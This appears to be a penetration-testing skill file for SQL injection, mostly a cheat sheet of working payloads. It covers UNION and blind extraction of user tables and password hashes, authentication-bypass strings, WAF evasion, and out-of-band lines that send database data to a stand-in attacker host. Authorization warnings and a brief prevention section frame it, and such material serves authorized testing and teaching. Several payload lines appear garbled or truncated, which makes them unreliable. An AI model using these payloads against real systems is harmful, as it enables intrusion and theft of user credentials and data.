| name | sql-injection-testing |
| description | SQL Injection Testing |
SQL Injection Testing
Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.
Description
USE WHEN:
- Testing for SQL injection vulnerabilities
- Performing authorized penetration tests
- Validating input sanitization mechanisms
- Bypassing authentication for security testing
- Extracting database information (authorized)
- Learning SQL injection defense
DON'T USE WHEN:
- No written authorization for testing
- Testing production systems with real user data
- Intent is malicious (don't be evil)
⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use.
Detection Phase
Injection Point Identification
Common injectable parameters:
URL params: ?id=1, ?user=admin, ?category=books
Form fields: username, password, search, comments
Cookies: session_id, user_preference
HTTP headers: User-Agent, Referer, X-Forwarded-For
Basic Vulnerability Tests
'
-- Double quote test
"
-- Comment sequences
--
#
/**/
-- Semicolon for query stacking
;
Watch for:
- Database error messages
- HTTP 500 errors
- Modified response content/length
- Unexpected behavior changes
Boolean Logic Tests
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--
-- False condition (should return nothing/error)
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2
Compare responses between true/false to confirm injection.
Exploitation Techniques
UNION-Based Extraction
ORDER BY 1
ORDER BY 2
ORDER BY 3
UNION SELECT NULL,NULL,NULL
UNION SELECT 'a',NULL,NULL
UNION SELECT NULL,'a',NULL
UNION SELECT username,password,NULL FROM users
UNION SELECT table_name,NULL,NULL FROM information_schema.tables
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
Error-Based Extraction
1' AND 1=CONVERT(int,(SELECT @@version))--
-- MySQL (XPATH)
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))
1' AND 1=CAST((SELECT version()) AS int)--
Blind Boolean-Based
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
Time-Based Blind
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)
1'; WAITFOR DELAY '0:0:5'--
-- PostgreSQL
1'; SELECT pg_sleep(5)
Out-of-Band (OOB)
1; EXEC master..xp_dirtree '\\attacker-server.com\share'
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
-- Oracle HTTP
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual
Authentication Bypass
admin'--
admin'
Filter Bypass Techniques
Character Encoding
%27 (single quote)
%22 (double quote)
%23 (hash)
%2527 (single quote)
SELECT * FROM users WHERE name=0x61646D696E
Whitespace Alternatives
SELECTusernameFROMusers
SELECT%09username%09FROM%09users
SELECT%0Ausername%0AFROM%0Ausers
Keyword Evasion
SeLeCt, sElEcT, SELECT
SELECT
UNION
SELSELECTECT → SELECT
UNUNIONION → UNION
Database Fingerprinting
| Database | Version Query |
|---|
| MySQL | SELECT @@version or SELECT version() |
| MSSQL | SELECT @@version |
| PostgreSQL | SELECT version() |
| Oracle | SELECT banner FROM v$version |
| SQLite | SELECT sqlite_version() |
Information Schema Queries
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
SELECT column_name FROM information_schema.columns WHERE table_name='users'
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
Quick Reference
| Purpose | Payload |
|---|
| Basic test | ' or " |
| Boolean true | OR 1=1-- |
| Boolean false | AND 1=2-- |
| Comment (MySQL) | # or -- |
| Comment (MSSQL) | -- |
| UNION probe | UNION SELECT NULL-- |
| Time delay | AND SLEEP(5)-- |
| Auth bypass | ' OR '1'='1 |
Detection Test Sequence
1. Insert ' → Check for error
2. Insert " → Check for error
3. Try: OR 1=1-- → Check for behavior change
4. Try: AND 1=2-- → Check for behavior change
5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay
Prevention (What to Look For in Code Review)
❌ Vulnerable
const query = `SELECT * FROM users WHERE id = '${userId}'`;
✅ Safe
const query = 'SELECT * FROM users WHERE id = $1';
const result = await db.query(query, [userId]);
const user = await prisma.user.findUnique({ where: { id: userId } });
Tools
- SQLMap: Automated SQL injection
- Burp Suite: Request manipulation
- OWASP ZAP: Web app scanner
- Havij: SQL injection tool
Troubleshooting
| Problem | Solution |
|---|
| No error messages | Use blind injection (boolean/time-based) |
| UNION fails | Check column count with ORDER BY |
| WAF blocking | Use encoding/evasion techniques |
| Payload not executing | Verify correct comment syntax for DB type |
| Time-based inconsistent | Use longer delays (10+ seconds) |
Ethical Guidelines
- Never execute destructive queries (DROP, DELETE) without explicit authorization
- Limit data extraction to proof-of-concept quantities
- Stop immediately upon detecting production data
- Report critical vulnerabilities through agreed channels
- Document all activities for audit trail